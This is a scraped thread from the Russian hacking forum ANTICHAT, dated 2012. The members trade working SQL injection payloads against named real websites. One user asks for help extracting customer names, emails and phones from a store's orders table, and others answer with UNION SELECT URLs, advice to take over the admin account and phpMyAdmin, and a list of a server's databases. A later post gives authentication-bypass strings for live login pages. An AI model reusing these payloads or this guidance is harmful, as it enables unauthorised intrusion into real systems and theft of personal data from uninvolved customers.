ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.08.2012, 14:30
|
|
Новичок
Регистрация: 16.03.2007
Сообщений: 24
Провел на форуме:
145084
Репутация:
2
|
|
Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537
bd: u0021_kinovdom
таблица: orders
колонки: name
email
phone
Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:
Count(*) of u0021_kinovdom.orders is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: name=
Turning on 'bypass illegal union' and retrying!
Data Found: email=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Turning on 'bypass illegal union' and retrying!
и так далее... Помогите пожалуйста достать эти данные!
|
|
|
02.08.2012, 14:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от lexus5122
lexus5122 said:
Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537
bd: u0021_kinovdom
таблица: orders
колонки: name
email
phone
Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:
Count(*) of u0021_kinovdom.orders is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: name=
Turning on 'bypass illegal union' and retrying!
Data Found: email=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Turning on 'bypass illegal union' and retrying!
и так далее... Помогите пожалуйста достать эти данные!
Ищи админку на сайте, потом войти как админ (данные админа вытащи из таблицы logins)
Затем ищи phpMyAdmin, ну а там я думаю догадаешься что нужно делать
|
|
|
|
02.08.2012, 14:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
lex1094
Сообщение от lex1094
lex1094 said:
Нашёл SQL Injections на сайте УФМС России по Приморскому краю, но разрабатывать её не стал.
Вот сама SQL: http://fmspk.ru/news.php?id=222'
Нормально нужно выкладывать, а не это
Сообщение от None
http://fmspk.ru/news.php?id=222+union+select+1,2,3,table_name,5+fr om+information_schema.tables
Сообщение от lexus5122
lexus5122 said:
Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537
bd: u0021_kinovdom
таблица: orders
колонки: name
email
phone
Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее:
Count(*) of u0021_kinovdom.orders is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: name=
Turning on 'bypass illegal union' and retrying!
Data Found: email=
Turning off 'bypass illegal union' and retrying!
Data Found: phone=
Turning on 'bypass illegal union' and retrying!
и так далее... Помогите пожалуйста достать эти данные!
Правильно пишет, потому что там пусто
Сообщение от None
http://www.kinovdom.ru/item.php?id=-18537+union+select+1,2,3,concat_ws%280x3a,name,ema il,phone%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+orders--
И главное, для подобных вопросов, тут есть отдельная тема, там и спрашивайте
Сообщение от None
/thread46016.html
|
|
|
|
02.08.2012, 15:27
|
|
Новичок
Регистрация: 16.03.2007
Сообщений: 24
Провел на форуме:
145084
Репутация:
2
|
|
Сообщение от lex1094
lex1094 said:
Ищи админку на сайте, потом войти как админ (данные админа вытащи из таблицы logins)
Затем ищи phpMyAdmin, ну а там я думаю догадаешься что нужно делать
Логинс, вытащил, а админка не ищется кроме как: http://www.kinovdom.ru:2082/ соответственно по этому пассу не входит ) Мне главное слить даже если без имен и телефонов, хоть емейлы
Сообщение от None
Правильно пишет, потому что там пусто
Цитата:
http://www.kinovdom.ru/item.php?id=-18537+union+select+1,2,3,concat_ws%280x3a,name,ema il,phone%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+orders--
а как же там может быть пусто... должны же где то храниться заказы\емейлы заказчиков...
|
|
|
|
02.08.2012, 15:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от lexus5122
lexus5122 said:
Логинс, вытащил, а админка не ищется кроме как: http://www.kinovdom.ru:2082/ соответственно по этому пассу не входит ) Мне главное слить даже если без имен и телефонов, хоть емейлы
а как же там может быть пусто... должны же где то храниться заказы\емейлы заказчиков...
Сообщение от None
http://www.kinovdom.ru/item.php?id=-18537+union+select+1,2,3,email,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,1%209,20,21+from+orders--
Я показал тему для таких вопросов?
и ещё раз
Сообщение от None
/thread46016.html
|
|
|
|
02.08.2012, 19:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Партия "Яблоко"
Сообщение от None
http://volgograd.yabloko.ru/news/index.phtml?id=-328+UniOn+select+1,2,3,4,5,6,7,8,9,10,table_name,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+i nformation_schema.tables--
|
|
|
|
04.08.2012, 23:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от None
http://www.mkb10.ru/?class=-14+union+select+concat_ws%280x3a,id,login,password ,root%29+from+u78252.admin--
4 символа
|
|
|
|
04.08.2012, 23:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
19040
Репутация:
32
|
|
Бинокли
Сообщение от None
http://www.pronv.us/catalog.php?id=-14 union select 1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7 --
|
|
|
|
05.08.2012, 00:04
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Host = www.rae.ru
Российская Академия Естесствознания
PR = 5
TYC = 1500
Inject
Код:
Code:
_ttp://www.rae.ru/fs/?section=content&op=show_article&article_id=7789203+and+1=2+union+select+1,2,3,4,5,null,7,null,9,10,11,12,null,null,null,16,17,18,19,20,21,22,23,24,25,26,null,28,29,null,31,version(),33
Info
VERSION = 5.5.24-log
USER = sup78user@localhost
DATABASE = fs
BASES:
Код:
Code:
information_schema
account
apsc
atmail
club
demo
econf
es1
express
famd
famous
forum
forum10
forum11
forum12
fs
horde
med
monogra
mysql
online
performance_schema
phpmyadmin_gAAfZmC2ngnA
psa
rae
research
rus-sci
science
se
shop
sitebuilder5
social
vak
who
Во все БД есть доступы и они от этих сайтов
1) www.rae.ru PR=5 TYC=1500
2) 15.rae.ru PR=4 TYC=0
3) express.rae.ru PR=3 TYC=0
4) gerb.rae.ru PR=4 TYC=0
5) online.rae.ru PR=3 TYC=20
6) russian-scientists.ru PR=4 TYC=30
7) science-education.ru PR=5 TYC=180
8) www.es.rae.ru PR=4 TYC=20
9) www.famous-scientists.ru PR=5 TYC=1400
10) www.monographies.ru PR=4 TYC=30
11) www.russian-scientists.ru PR=4 TYC=30
ByPass authentication SQL-Injection:
1) _ttp://online.rae.ru/login/auth/
Login = ' or 1='1
Password = ' or 1='1
2) _ttp://www.famous-scientists.ru/login/auth/
Login = admin' or 1='1
Pass = admin' or 1='1
Ну и последняя плюшка...
Админка от 1C Bitrix. Вдруг пасс расшифруете, я не смог =(
_ttp://russian-scientists.ru:8888/bitrix/admin/
З.Ы. Если зальёте шелл - напомните мне в ПМ, что я неудачник =)
|
|
|
|
05.08.2012, 00:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
19040
Репутация:
32
|
|
saveoursound
Сообщение от None
http://www.saveoursound.org/news/reader.php?id=-247 union select (select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name))))x),2,3,4,5,6, 7,8,9--
Корова
Код:
Code:
http://www.korova.ru/humor/viewer.php?id=-32 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8 --
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
